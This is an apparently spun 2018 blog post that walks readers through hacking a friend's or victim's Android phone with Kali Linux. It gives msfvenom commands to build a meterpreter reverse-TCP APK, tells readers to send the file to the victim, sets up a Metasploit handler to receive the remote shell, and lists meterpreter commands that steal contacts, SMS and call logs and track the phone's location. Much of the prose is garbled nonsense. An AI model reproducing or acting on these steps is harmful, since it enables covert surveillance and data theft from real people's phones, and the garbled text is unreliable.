Friday 12 January 2018

Hack Android Phone With Kali Linux | phone Hacked kali linux

Hack Android mobile by phishing




MOBILE HACKING WITH KALI LINUX
MOBILE PHONE HACKING WITH KALI LINUX




HELLO,

 my hackers' friends today my topic is about how to hack an android phone you can hack it easily because nowadays every single mobile can be hacked and lots of websites that can help us to hack a mobile phone because they are providing best phishing attacks and helping like your friends you can any social account too with the topic I am explaining now.

NOTE: if you are thinking that these websites will help you directly to hack an Android phone so its completely wrong as you  known  phishing is just a game you will hack the victim brain to hack their system mobiles computers cameras etc otherwise this is not  a direct way to hack or ot take control of something this is just social engineering and this brain hacking you will trick your victims to get hacked otherwise this is impossible! 


 Now I wanna show you how you can hack your friends mobile or your victims miobiles.

note this is just an article on how you can hack a mobile phone and how you can protect yourself from hacking !

why hackers use the hackers mask or unknown people picture or something else whatever but they don't show the face of themselves it is just because of they are hackers and they doing unethical works and if they are showing there faces over internet so they can be caught very easily so this is why they use these picture I have uploaded down download hackers pictures if you love hackers and if you are hacker yourself so,

KALI LINUX ...


#1.Open Kali terminal on your computer.

#2.We will be reaching to use “MSFVENOM” to make a malicious apk file that we'll install on the automaton phone.

#3.Paste these given commands in terminal.



                     msfvenom -p android/meterpreter/reverse_tcp 
                     LHOST=172.16.27.207 R >                                                                                               root/itechhacks.apk

#4. modification the “LHOST” to you native information processing address and press enter.

#5. currently, open the foundation folder and send the techhacks.apk to the victim.

#6.  Open a brand new terminal and enter “msfconsole.”

#7. when gap Metasploit console kind these following commands that area unit wont to produce payload handler which is able to produce an association between the victim and Kali computer. 



use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 172.16.27.207 exploit
#8. modification the LHOST to your native information processing address. Also, don’t shut this terminal.

#9.  Wait till victim opens the file.

#10. when the victim opens the file, you may get a interpreter session. currently open the MSF console terminal and use session -i 1command  to access the session.

Command Description 
——- ———– 
activity_start begin associate automaton activity from a Uri string 
check_root Check if device is unmoving 
dump_calllog Get decision log 
dump_contacts Get contacts list 
dump_sms Get sms messages 
geolocate Get current lat-long exploitation geolocation 
interval_collect Manage interval assortment capabilities 
send_sms Sends SMS from target session 
set_audio_mode Set Ringer Mode 
sqlite_query question a SQLite information from storage 
wlan_geolocate Get current lat-long exploitation wireless fidelity info

We will not responsible for any task you do and learning here from us so please use this skill and energy at the right place and learn more with us.



No comments:

Post a Comment

If you have any question about This Post you can Comment down I will reply you with your solution !

Featured Post

yyy